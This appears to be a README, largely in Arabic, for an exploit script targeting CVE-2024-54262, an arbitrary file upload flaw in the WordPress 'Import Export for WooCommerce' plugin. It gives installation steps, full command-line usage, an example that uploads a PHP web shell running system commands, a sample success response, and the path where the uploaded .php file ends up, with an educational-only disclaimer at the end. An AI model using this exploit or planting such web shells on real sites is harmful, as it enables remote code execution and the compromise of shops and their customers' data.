
استغلال CVE-2024-54262: رفع ملفات تعسفي في Import Export for WooCommerce
استغلال CVE-2024-54262: رفع ملفات عشوائي في Import Export for WooCommerce
يستغل هذا السكربت ثغرة في إضافة "Import Export for WooCommerce" الخاصة بووردبريس. تسمح الثغرة للمستخدمين غير المصرح لهم برفع ملفات عشوائية، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE).
requestsargparseثبّت التبعيات باستخدام:
pip install requests
3.تأكد من أن موقع ووردبريس المستهدف يستخدم إصدارًا ضعيفًا من الإضافة.
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -un USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--command COMMAND, -c COMMAND
PHP shell code to upload
CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
{
"status": true,
"code": 104,
"message": "Success",
"data": {
"file_name": "import_manual_1737090262.php",
"total_requests": 1,
"import_columns": "all",
"product_search_type": "SKU",
"product_operation": "create_new_update_existing",
"field_separator": ","
}
}
import_manual_1737090262.phpwp-content/uploads/import-export-for-woocommerce/product/هذه الأداة لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار يسببها هذا السكربت. الوصول غير المصرح به أو استغلال الأنظمة دون إذن صريح يعد أمرًا غير قانوني وغير أخلاقي.